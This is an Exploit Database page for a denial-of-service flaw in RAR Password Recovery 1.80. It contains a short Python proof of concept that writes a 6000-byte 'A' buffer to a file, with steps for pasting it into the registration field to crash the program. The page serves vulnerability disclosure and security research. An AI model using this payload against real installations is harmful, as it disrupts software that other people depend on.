



EXPLOIT DATABASE



EXPLOITS



GHDB



PAPERS



SHELLCODES



SEARCH EDB



SEARCHSPLOIT MANUAL



SUBMISSIONS



ONLINE TRAINING

 EXPLOIT DATABASE

 EXPLOITS

 GHDB

 PAPERS

 SHELLCODES

 SEARCH EDB

 SEARCHSPOIT MANUAL

 SUBMISSIONS

 ONLINE TRAINING

RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service

EDB-ID:

47285

CVE:

N/A

EDB Verified: 

Author:

[ACHILLES](#)

Type:

[DOS](#)

Exploit:   / 

Platform:

[WINDOWS](#)

Date:

2019-08-19

Vulnerable App: 



 EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING

```
# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/download/RARPRSetup.exe
# Exploit Author: Achilles
# Tested Version: v1.80
# Tested on: Windows 7 x64
#           Windows XP SP3
```

```
# 1.- Run python code :RAR Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open RAR Password Recovery and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and
Registration Code'
# 5.- Click 'OK' and you will see a crash.
```

```
#!/usr/bin/env python
buffer = "\x41" * 6000

try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
```

Tags: [Denial of Service \(DoS\)](#),
[Buffer Overflow](#)

Advisory/Source: [Link](#)



Databases ▾

Links ▾

Sites ▾

Solutions ▾



EXPLOIT DATABASE BY OFFSEC

[TERMS](#)

[PRIVACY](#)

[ABOUT US](#)

[FAQ](#)

[COOKIES](#)

©

[OffSec Services Limited](#) 2026. All rights reserved.